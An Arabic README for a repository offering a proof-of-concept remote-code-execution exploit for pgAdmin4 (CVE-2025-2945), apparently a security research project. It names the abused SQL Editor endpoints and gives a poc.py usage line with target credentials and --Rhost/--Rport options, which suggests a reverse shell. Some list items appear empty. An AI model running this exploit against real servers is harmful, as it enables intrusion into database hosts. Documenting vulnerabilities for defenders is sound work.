
استغلال لإثبات المفهوم لتنفيذ الأكواد عن بُعد بعد المصادقة في pgAdmin4 (CVE-2025-2945) عبر إساءة استخدام محرر SQL. مصمم للاختبارات الأمنية المصرح بها والأغراض التعليمية.
يحتوي هذا المستودع على نص برمجي لإثبات المفهوم (PoC) أُنشئ لأغراض البحث الأمني واختبار الاختراق المصرح به والمتعلق بالثغرة CVE-2025-2945، والتي تؤثر على إصدارات معينة من pgAdmin4.
تتيح هذه المشكلة لمستخدم pgAdmin مُوثَّق لديه حق الوصول إلى محرر SQL (SQL Editor) تشغيل تنفيذ تعليمات برمجية عن بُعد عبر إساءة استخدام تدفق تهيئة لوحة Query Tool. يعرض هذا الـ PoC الثغرة لأغراض تعليمية وتدقيقية ودفاعية فقط.
هذه الأداة مخصصة فقط من أجل:
لا تستخدم هذه الأداة على أي نظام دون إذن صريح. الاستخدام غير المصرح به غير قانوني وغير أخلاقي. المؤلف غير مسؤول عن أي إساءة استخدام.
تنبع الثغرة من عيوب منطقية في نقاط نهاية تهيئة محرر SQL. عند التفاعل مع /sqleditor/initialize/ و /sqleditor/panel/، يتعامل التطبيق بشكل خاطئ مع البيانات التي يتحكم بها المستخدم، مما يسمح في النهاية لحمولات مصممة خصيصًا بتنفيذ أوامر خلفية (Backend) عشوائية.
يستغل الـ PoC تسلسل نقاط النهاية التالي:
requestspython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(مثال كامل مُدرَج بالفعل في قسم المساعدة الخاص بالنص البرمجي.)
poc.py → النص البرمجي لإثبات المفهوم (الاستغلال)
README.md → توثيق المشروع
يجب على المسؤولين:
المؤلف: UdayVeer